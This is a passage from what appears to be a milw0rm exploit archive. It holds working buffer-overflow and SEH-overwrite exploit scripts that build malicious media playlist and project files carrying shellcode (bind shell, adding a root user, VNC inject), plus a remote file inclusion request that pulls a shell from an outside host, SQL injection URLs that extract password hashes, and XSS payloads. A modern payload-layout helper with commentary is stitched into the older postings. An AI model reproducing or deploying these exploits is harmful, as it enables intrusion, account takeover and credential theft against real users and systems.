"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
"\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
my $bind_vncinject =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50".
"\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36".
"\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30".
"\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55".
"\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33".
"\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c".
"\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30".
"\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51".
"\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56".
"\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e".
"\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43".
"\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50".
"\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38".
"\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58".
"\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e".
"\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50".
"\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e".
"\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50".
"\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e".
"\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c".
"\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a".
"\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45".
"\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55".
"\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47".
"\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43".
"\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48".
"\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f".
"\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55".
"\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48".
"\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50".
"\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55".
"\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32".
"\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c".
"\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e".
"\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35".
"\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30".
"\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a";
my $id = $ARGV[0];
# concatenate outside double quotes; inside "..." the dots would be emitted as literal bytes
if ($id == 1) {
print $header.$junk.$ret.$nop.$calc_shell.$nop;
exit;
}
if ($id == 2) {
print $header.$junk.$ret.$nop.$adduser_shell.$nop;
exit;
}
if ($id == 3) {
print $header.$junk.$ret.$nop.$bind_shell.$nop;
exit;
}
if ($id == 4) {
print $header.$junk.$ret.$nop.$bind_vncinject.$nop;
exit;
}
print "\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print " +++ +++\n";
print " +++ +++\n";
print " +++ MediaCoder 0.6.2.4275 Universal Stack-Based Overflow +++\n";
print " +++ Written By Stack +++\n";
print " +++ +++\n";
print " +++ Usage Ex.: perl $0 1 >>Exploit.m3u +++\n";
print " +++ +++\n";
print " +++ Options: +++\n";
print " +++ 1 - win32_exec calc.exe +++\n";
print " +++ 2 - win32_adduser Pass=toor User=root +++\n";
print " +++ 3 - win32_bind Port 5555 +++\n";
print " +++ 4 - win32_bind_vncinject Port 5900 +++\n";
print " +++ +++\n";
print " +++ +++\n";
print " +++ +++\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
exit;
#EOF

# milw0rm

RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit

#!/usr/bin/python
# RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit
# Exploited By : zAx
# Discovered and Idea By : Encrypt3d.M!nd
# Tested On : Windows XP ServicePack 2 English.
# Thanks to : All My Friends.
print " RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit"
print " Written By : zAx"
print " Contact : ThE-zAx@Hotmail.Com"
header = "[Project]\nAssembler=masm\nGroup=1\nGroupExpand=1\n[Files]\n1="
zAx = "c4ca4238a0b923820dcc509a6f75849bc81e728d9d4c2f636f067f89cc14862ceccbc87e4b5ce2fe28308fd9f2a7baf3a87ff679a2f3e71d9181a67b7542122ce4da3b7fbbce2345d7772b0674a318d51679091c5a880faf6fb5e6087eb1b2dc8f14e45fceea167a5a36dedd4bea2543c9"
eip = "\x5D\x38\x82\x7C" # KERNEL32.DLL ESP In Windows SP2 EN
nopsled = "\x90"*20
#win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x54\x4e\x43\x4b\x48\x4e\x57"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38"
"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x46\x50\x45\x57\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x53"
"\x42\x4c\x46\x56\x4b\x48\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x58\x42\x44\x4e\x30\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x45\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x46\x4a\x59"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
"\x4e\x46\x43\x46\x50\x42\x45\x46\x4a\x47\x45\x36\x42\x30\x5a"
)
stack = header + zAx + eip + nopsled + shellcode + nopsled
# do not shadow the Python 2 builtin "file"
out = open("zAx.rap", "w")
out.write(stack)
out.close()
raw_input("\nExploit file created!, Now Go to RadASM and Open Our Devil Project :D\n")

# milw0rm

EO Video v1.36 PlayList SEH Overwrite Exploit

#!/usr/bin/python
#usage: exploit.py
print "**************************************************************************"
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploit\n"
print "[*] Author: j0rgan"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)\n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
print "**************************************************************************"

buff = "\x41" * 1356

next_seh = "\xEB\x06\x41\x41"

seh = "\x14\x1E\x5B\x58" # pop pop ret from msgsm32.acm (0x585B1E14, little-endian)

header1= (
"\x3C\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E\x0A\x3C\x50\x6C\x61\x79\x6C"
"\x69\x73\x74\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73\x74\x3E\x0A\x3C"
"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F"
"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65"
"\x6E\x63\x79\x3E\x31\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63"
"\x79\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x46\x6F\x6C\x64\x65"
"\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F\x3C\x2F\x4E\x61\x6D"
"\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x31"
"\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x0A\x3C\x2F"
"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73"
"\x74\x3E\x0A\x3C\x50\x72\x6F\x6A\x65\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E"
"\x0A\x3C\x4E\x61\x6D\x65\x3E")

header2= (
"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E"
"\x30\x3C\x2F\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E\x0A\x3C\x45\x6E\x64\x54"
"\x69\x6D\x65\x3E\x30\x3C\x2F\x45\x6E\x64\x54\x69\x6D\x65\x3E\x0A\x3C\x4D\x65"
"\x64\x69\x61\x53\x69\x7A\x65\x3E\x0A\x3C\x57\x69\x64\x74\x68\x3E\x2D\x31\x3C"
"\x2F\x57\x69\x64\x74\x68\x3E\x0A\x3C\x48\x65\x69\x67\x68\x74\x3E\x2D\x31\x3C"
"\x2F\x48\x65\x69\x67\x68\x74\x3E\x0A\x3C\x2F\x4D\x65\x64\x69\x61\x53\x69\x7A"
"\x65\x3E\x0A\x3C\x53\x74\x61\x74\x65\x3E\x33\x30\x32\x31\x36\x3C\x2F\x53\x74"
"\x61\x74\x65\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73\x69\x74\x69\x6F"
"\x6E\x49\x6E\x64\x65\x78\x3E\x30\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73"
"\x69\x74\x69\x6F\x6E\x49\x6E\x64\x65\x78\x3E\x0A\x3C\x2F\x50\x72\x6F\x6A\x65"
"\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E\x0A\x3C\x2F\x50\x6C\x61\x79\x6C\x69"
"\x73\x74\x3E\x5C\x6E\x3C\x2F\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E")


# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x35"
"\x9c\xf7\xbc\x83\xeb\xfc\xe2\xf4\xc9\x74\xb3\xbc\x35\x9c\x7c\xf9"
"\x09\x17\x8b\xb9\x4d\x9d\x18\x37\x7a\x84\x7c\xe3\x15\x9d\x1c\xf5"
"\xbe\xa8\x7c\xbd\xdb\xad\x37\x25\x99\x18\x37\xc8\x32\x5d\x3d\xb1"
"\x34\x5e\x1c\x48\x0e\xc8\xd3\xb8\x40\x79\x7c\xe3\x11\x9d\x1c\xda"
"\xbe\x90\xbc\x37\x6a\x80\xf6\x57\xbe\x80\x7c\xbd\xde\x15\xab\x98"
"\x31\x5f\xc6\x7c\x51\x17\xb7\x8c\xb0\x5c\x8f\xb0\xbe\xdc\xfb\x37"
"\x45\x80\x5a\x37\x5d\x94\x1c\xb5\xbe\x1c\x47\xbc\x35\x9c\x7c\xd4"
"\x09\xc3\xc6\x4a\x55\xca\x7e\x44\xb6\x5c\x8c\xec\x5d\x6c\x7d\xb8"
"\x6a\xf4\x6f\x42\xbf\x92\xa0\x43\xd2\xff\x96\xd0\x56\x9c\xf7\xbc"
)

exploit = header1 + buff + next_seh + seh + shellcode + header2

try:
    out_file = open("exploit.eop", 'wb')  # binary mode so the \x0A bytes in the headers are not rewritten as \r\n
    out_file.write(exploit)
    out_file.close()
    print "Exploit File Created!\nNow Open it :)"
except IOError as e:
    print "Error:", e

# milw0rm

mks_vir 9b < 1.2.0.0b297 (mksmonen.sys) Privilege Escalation Exploit

MKS Sp. z o. o. - http://www.mks.com.pl/

Affected Software:
mks_vir 9 BETA < 1.2.0.0 - build 297

Affected Driver:
mksmonen.sys

Local Privilege Escalation Exploit
For Educational Purposes Only !

NT Internals - http://www.ntinternals.org/
alex ntinternals org

References:
mks_vir (mksmonen.sys) Privilege Escalation Vulnerability
NTIADV0809 - http://www.ntinternals.org/ntiadv0809/ntiadv0809.html

Exploiting Common Flaws in Drivers
Ruben Santamarta - http://www.reversemode.com/

Exploit:
http://ntinternals.org/ntiadv0809/MksMonEn_Exp.zip
http://milw0rm.com/sploits/2009-MksMonEn_Exp.zip


Advisory:
http://ntinternals.org/ntiadv0809/ntiadv0809.html

# milw0rm

Realtek Sound Manager 1.15.0.0 PlayList SEH Overwrite Exploit

#!/usr/bin/python

print "[*] Realtek Sound Manager 1.15.0.0 (PlayList) Seh Overwrite Exploit\n"
print "[*] Author: shinnai"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)\n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"

buff = "\x41" * 200

next_seh = "\xEB\x06\x90\x90"

seh = "\xBE\x2E\xC6\x72" #pop pop ret msacm32.drv

buff2 = "\x44"*1989

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
)

exploit = buff + next_seh + seh + shellcode + buff2

try:
    out_file = open("exploit.pla", 'wb')  # binary mode keeps the payload bytes intact on Windows
    out_file.write(exploit)
    out_file.close()
    print "Exploit File Created!\nNow import it from Realtek"
except IOError as e:
    print "Error:", e

# milw0rm

Blogsa <= 1.0 Beta 3 XSS Vulnerability

Software: Blogsa <= 1.0 Beta 3
Software Site: blogsa.net
Discovered by: Onur YILMAZ aka DJR
Blog: http://www.onuryilmaz.info
E-mail: contactonuryilmazinfo

XSS

http://localhost/Widgets.aspx?w=Search&p=do&searchText=<script>alert(document.cookie)</script>

Screen

http://img14.imageshack.us/img14/7803/12371681.jpg

Belkin BullDog Plus UPS-Service Buffer Overflow Exploit

Belkin BullDog Plus UPS-Service Buffer Overflow Exploit

Tested on Windows XP SP3
JMP ESP from user32.dll, 0x7E429353
Shellcode is bind 4444 from Metasploit

nc host port < belkin-buldog-exploit

That's all, folks!

http://milw0rm.com/sploits/2009-belkin-bulldog-exploit.zip

# milw0rm

CMS S.Builder <= 3.7 Remote File Inclusion Vulnerability

CMS S.Builder <= 3.7 RFI Vulnerability

Information:

Vendor: http://www.sbuilder.ru
Affected versions: 3.7 and possibly later versions


Description:

The engine of this CMS generates the site's files (index.php, etc.) with code like:
PHP Code:

if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';
...
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
...

With register_globals=On, an attacker can populate binn_include_path from the request (the PoC below uses a cookie) with either a remote URL or a local path. A remote URL is only fetched if allow_url_fopen=On, and on PHP 5.2 and later include() of a URL additionally requires allow_url_include=On; a local path turns the bug into a local file inclusion.


PoC:

HTTP Request:

GET /index.php HTTP/1.1
Host: www.site.com
Cookie: binn_include_path=http://evil.site.com/shell.txt?

# by cr0w
# http://cr0w-at.blogspot.com

# milw0rm

nForum 1.5 Multiple Remote SQL Injection Vulnerabilities

Application: nForum
Version: 1.5
Website: http://sourceforge.net/projects/nforum/

Bugs: [A] Multiple SQL Injection

Exploitation: Remote

Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com

Menu

1) Bugs
2) Code
3) Fix

Bugs

- [A] Multiple SQL Injection

Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php

These bugs allow a guest to retrieve the username and
password hash of a registered user.

[+] Code

- [A] Multiple SQL Injection

http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23

http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23

Fix

No fix.

# milw0rm

Nokia Multimedia Player 1.0 (playlist) Universal SEH Overwrite Exploit

#!/usr/bin/python
#usage: exploit.py
print "**************************************************************************"
print " Nokia Multimedia Player 1.0 (playlist) Universal Seh Overwrite Exploit\n"
print " Founder : 0in"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"



buff = "\x41" * 1880

next_seh = "\xEB\x06\x41\x41"

nops = "\x90"*19

seh = "\x0E\xD2\x8E\x01" #yes universal :D




# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x67"
"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x77\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6b\x59\x79\x6c\x6b"
"\x58\x37\x34\x53\x30\x35\x50\x53\x30\x6c\x4b\x41\x55\x47\x4c\x6c"
"\x4b\x51\x6c\x63\x35\x54\x38\x77\x71\x7a\x4f\x6e\x6b\x70\x4f\x74"
"\x58\x4e\x6b\x43\x6f\x37\x50\x43\x31\x5a\x4b\x47\x39\x4e\x6b\x37"
"\x44\x6c\x4b\x45\x51\x58\x6e\x37\x41\x6b\x70\x6c\x59\x6c\x6c\x4f"
"\x74\x6f\x30\x62\x54\x47\x77\x6b\x71\x59\x5a\x76\x6d\x74\x41\x6b"
"\x72\x58\x6b\x69\x64\x65\x6b\x41\x44\x47\x54\x34\x44\x44\x35\x38"
"\x65\x6e\x6b\x33\x6f\x31\x34\x37\x71\x6a\x4b\x51\x76\x6e\x6b\x44"
"\x4c\x42\x6b\x6e\x6b\x43\x6f\x57\x6c\x55\x51\x6a\x4b\x4c\x4b\x47"
"\x6c\x4e\x6b\x75\x51\x4a\x4b\x4e\x69\x31\x4c\x66\x44\x37\x74\x4f"
"\x33\x55\x61\x4f\x30\x30\x64\x6e\x6b\x77\x30\x36\x50\x4e\x65\x39"
"\x50\x31\x68\x64\x4c\x6c\x4b\x73\x70\x36\x6c\x6e\x6b\x30\x70\x37"
"\x6c\x6c\x6d\x4e\x6b\x45\x38\x45\x58\x58\x6b\x73\x39\x6e\x6b\x4b"
"\x30\x4e\x50\x75\x50\x73\x30\x63\x30\x6c\x4b\x45\x38\x65\x6c\x31"
"\x4f\x30\x31\x4c\x36\x75\x30\x32\x76\x6d\x59\x59\x68\x6c\x43\x4b"
"\x70\x41\x6b\x46\x30\x45\x38\x48\x70\x4e\x6a\x65\x54\x43\x6f\x71"
"\x78\x4f\x68\x59\x6e\x4c\x4a\x76\x6e\x52\x77\x6b\x4f\x6b\x57\x72"
"\x43\x53\x51\x30\x6c\x52\x43\x77\x70\x67"
)


exploit = buff + next_seh + seh + nops + shellcode

try:
    out_file = open("nokia.npl", 'wb')  # binary mode keeps the payload bytes intact on Windows
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!\n"
except IOError as e:
    print "Error:", e
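The EO Video, Realtek and Nokia scripts above all use the same layout: filler up to the exception record, a short jump in the "next SEH" slot, a pop/pop/ret address in the handler slot, then the shellcode. The Python 3 helper below is an added example, not code from any of those scripts: it builds that layout and checks the things that silently break SEH exploits before the file is written. The handler address 0x585B1E14 is the msgsm32.acm pop/pop/ret the EO Video script uses (written little-endian as \x14\x1E\x5B\x58); the 16-byte INT3 shellcode is a constructed placeholder; the offsets 1356 and 1880 are the scripts' own.

```python
import struct

# Added example, not part of the original exploit scripts.
# Handler address from the EO Video script above (pop/pop/ret in msgsm32.acm).
POP_POP_RET = 0x585B1E14

# "jmp short +6" (EB 06): the displacement is relative to the end of this
# 2-byte instruction, so it skips the 2 padding bytes plus the 4-byte handler
# pointer and lands on the first byte after the SEH slot.
NEXT_SEH = b"\xEB\x06\x90\x90"

# Constructed stand-in for real shellcode: INT3 breakpoints, so a debugger
# stops exactly where control arrives.
SHELLCODE = b"\xCC" * 16


def build_seh_payload(offset, handler, shellcode, nops=0, filler=b"A"):
    """filler*offset | nSEH (jmp short) | SEH (handler, little-endian) | nops | shellcode"""
    return (filler * offset
            + NEXT_SEH
            + struct.pack("<I", handler)
            + b"\x90" * nops
            + shellcode)


def short_jump_target(payload, at):
    """Index at which the 'jmp short rel8' located at payload[at] transfers control."""
    if payload[at] != 0xEB:
        raise ValueError("no jmp short at offset %d" % at)
    rel8 = payload[at + 1]
    disp = rel8 - 256 if rel8 >= 0x80 else rel8   # rel8 is a signed byte
    return at + 2 + disp


def bad_bytes(payload, banned):
    """Sorted list of banned byte values that occur anywhere in payload."""
    return sorted(set(payload) & set(banned))


def check_layout(offset, handler, shellcode, nops=0, banned=b"\x00"):
    """Build the buffer and verify: no banned byte in nSEH/SEH, the short jump
    lands on the byte right after the handler pointer, and the shellcode sits
    where that jump (plus the NOP sled) expects it."""
    payload = build_seh_payload(offset, handler, shellcode, nops)
    seh_at = offset + 4
    landing = short_jump_target(payload, offset)
    expected = seh_at + 4
    problems = []
    banned_found = bad_bytes(payload[offset:seh_at + 4], banned)
    if banned_found:
        problems.append("banned byte(s) in nSEH/SEH: %r" % banned_found)
    if landing != expected:
        problems.append("jmp lands at %d, expected %d" % (landing, expected))
    if payload[expected + nops:expected + nops + len(shellcode)] != shellcode:
        problems.append("shellcode not where the jump expects it")
    return payload, problems


if __name__ == "__main__":
    # EO Video layout: 1356 bytes of filler, no NOPs between SEH and shellcode.
    payload, problems = check_layout(1356, POP_POP_RET, SHELLCODE)
    print("EO Video layout:", problems or "ok", "total length", len(payload))
    # Nokia layout: 1880 bytes of filler and 19 NOPs after the handler.
    payload, problems = check_layout(1880, 0x018ED20E, SHELLCODE, nops=19)
    print("Nokia layout:", problems or "ok", "total length", len(payload))
```

The banned-byte set defaults to NUL only; a playlist or XML-style format such as the EO Video .eop file may also break on 0x0A or on `<` and `>`, and those belong in `banned` for that target. The Nokia script's 19 NOPs go after the handler slot, so the jump lands at the start of the sled rather than directly on the shellcode; the check accepts both arrangements.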

# milw0rm

UMI.CMS Cross-Site Scripting vulnerability

Affected Software

UMI.CMS
Versions 2.x prior to 2.7.1 (build 10856)

Product Link:
http://www.umi-cms.ru


Severity Rating

Severity: Medium
Impact: Cross-Site Scripting
Attack Vector: Remote

CVSS v2:
Base Score: 4.3
Temporal Score: 3.4
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C)

CVE: not assigned

Software Description

UMI.CMS is content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).

Vulnerability Description

Positive Technologies Research Team has discovered a Cross-Site Scripting (XSS) vulnerability in UMI.CMS.

User input passed to the "fields_filter" parameter is not properly sanitized before being returned in the page. This can be exploited to inject arbitrary HTML and script code that executes in a user's browser session in the context of the affected site.

Example:
http://[server]/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&fields_filter[price][1]=1

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool users in order to gather data from their machines. An attacker can steal the session cookie and take over the account impersonating the user. It is also possible to modify page content presented to the user.

Solution

Update to version 2.7.1 (build 10856).

Disclosure Timeline

04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
06/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure


Credits

This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.

References

http://en.securitylab.ru/lab/PT-2009-12
